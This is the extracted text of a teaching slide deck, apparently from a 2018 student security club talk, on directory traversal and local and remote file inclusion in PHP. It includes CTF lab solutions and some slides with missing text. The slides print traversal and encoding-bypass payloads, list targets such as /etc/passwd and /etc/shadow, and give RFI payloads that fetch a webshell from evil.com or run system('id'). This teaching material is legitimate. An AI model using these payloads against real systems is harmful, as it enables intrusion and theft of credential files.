This document discusses directory traversal, file inclusion, and local file inclusion (LFI) vulnerabilities. It provides an overview of these vulnerabilities, how to find and exploit them, and recommendations for prevention. The document also describes several LFI labs that can be used for hands-on practice exploiting LFI vulnerabilities by manipulating file paths and encodings.

1. OWASP -
FILE INCLUDE
BY ROY - 2018/10/16

2. OWASP - FILE INCLUDE
$ WHOAMI
▸ -
▸ 107 - NISRA
▸ Roy

3. OWASP - FILE INCLUDE
INDEX.
▸ Directory Traversal
▸ File Include
▸ Lab Time

4. DIRECTORY TRAVERSAL
DIRECTORY TRAVERSAL
▸
▸

5. DIRECTORY TRAVERSAL
▸
▸
▸ ( )
▸

6. DIRECTORY TRAVERSAL
怎麼找︖
▸ Google Hacking
intitle: index of <somthing>

7. DIRECTORY TRAVERSAL
怎麼防護︖
▸ Indexes
Apache2 Nginx

8. DIRECTORY TRAVERSAL
ROBOTS.TXT
▸

9. FILE INCLUDE
先備知識：路徑 (UNIX)
▸
▸ /I/am/a/absolute/path
▸
▸ ./
▸ ../

10. FILE INCLUDE
先備知識：URL
▸ scheme://host:port/path?query=val&query2=val2
▸ scheme
▸ host
▸ port
▸ path
▸ ?query=val (GET)

11. FILE INCLUDE
URL ENCODING 百分號編碼
▸ URL ASCII
▸ %XX => hex
▸ %2E => .
▸ %2F => /

12. 什麼是 FILE INCLUDE

13. FILE INCLUDE
FILE INCLUDE
▸
▸
▸

14. FILE INCLUDE
PHP
▸ PHP: Hypertext Preprocessor
▸ PHP:
▸

15. FILE INCLUDE
PHP
▸ include ’something’;
▸
▸ require ‘something’;
▸

16. LFI
LOCAL FILE INCLUSION
▸
▸

17. LFI
⽬的
▸
▸ Get Shell ( )

18. LAB
LAB 說明
▸ lab FLAG
▸ Lab 140.136.150.68:8080
▸ 8080, 9001-9009
▸ flag.txt
▸ NISRA{xxxx}

19. LFI
LAB 01 更改參數
▸ URL flag

20. LFI
LAB 01 參考解法
▸?path=flag.txt▸?path=default.php

21. LFI
除了FLAG之外呢︖
▸ Linux
▸ /etc/passwd
▸ /etc/issue
▸ /proc/version
▸ /etc/profile ( )
▸ /etc/shadow hash ( )

22. LFI
LAB 02 起⼿式 ../
▸ ../ flag

23. LFI
LAB 02 參考解法
▸ ?path=../flag.txt
▸ flag.txt

24. LFI
LAB 03 過濾
▸ ../
▸ . [../]./

25. LFI
LAB 03 參考解法
. [. . /]. / . . /
?path=…/./flag.txt
?path=../flag.txt

26. LFI
LAB 04 - 更強的過濾
▸
▸ file:// / file protocol)
▸ flag (root)

27. LEI
LAB 04 - 參考解法
▸ file
▸ ?path=file:///flag.txt

28. LFI
LAB 05 - %00
▸
▸ %00 = NULL = 0
▸ flag

29. LFI
LAB 05 - 參考解法
▸ PHP version < 5.3.4
▸ ?path=../flag.txt%00
../flag.txtx00.php

30. RFI
REMOTE FILE INCLUSION
▸
▸ URL

31. RFI
常⾒⼿法
▸ php://filter
▸ ?page=http://evil.com/webshell.php?
▸ php://input + POST
▸ data:text/plain,<?php system(‘id');?>
FireFox - HackBar curl

32. RFI
但是......
▸ QQ
▸ php.ini allow_url_include off
In php.ini Line:833

33. OWASP - FILE INCLUDE
如何防禦︖
▸ ( )
▸ function
▸ mod_security

34. OWASP - FILE INCLUDE
練習平台
▸ DVWA
▸ bWAPP

35. OWASP - FILE INCLUDE
結語
▸ Directory Traversal
▸ File Inclusion

36. LFI
LAB SPECIAL 0X01
▸ ../
▸

37. LFI
全…全形︖
▸ = FF2E
▸ ?path= /
?path=xFF2E xFF2E/
?path=xFF2ExFF2E/
?path= . . /

38. LFI
LAB SPECIAL 0X01
▸ ?path=../flag.txt
▸ ?path= /flag.txt
?path= ./flag.txt

39. LFI
LAB SPECIAL 0X02
▸

40. LFI
LAB SPECIAL 0X02 參考解法
▸ Double Encoding
▸ %25 2E %25 2E /
% 2E % 2E /
. . /

41. LFI
LAB SPECIAL 0X02 參考解法
▸ ?path= 2E 2E/flag.txt
▸ ?path=FF25 2E FF25 2E/flag.txt
% 2E % 2E
?path=. . /flag.txt

42. OWASP - FILE INCLUDE
參考資料
▸ https://hackmd.io/Zr2QoYwYQBmQLq6SsNiHcQ?view
▸ Lab DVWA bWAPP
▸ Lab
▸ Theo PS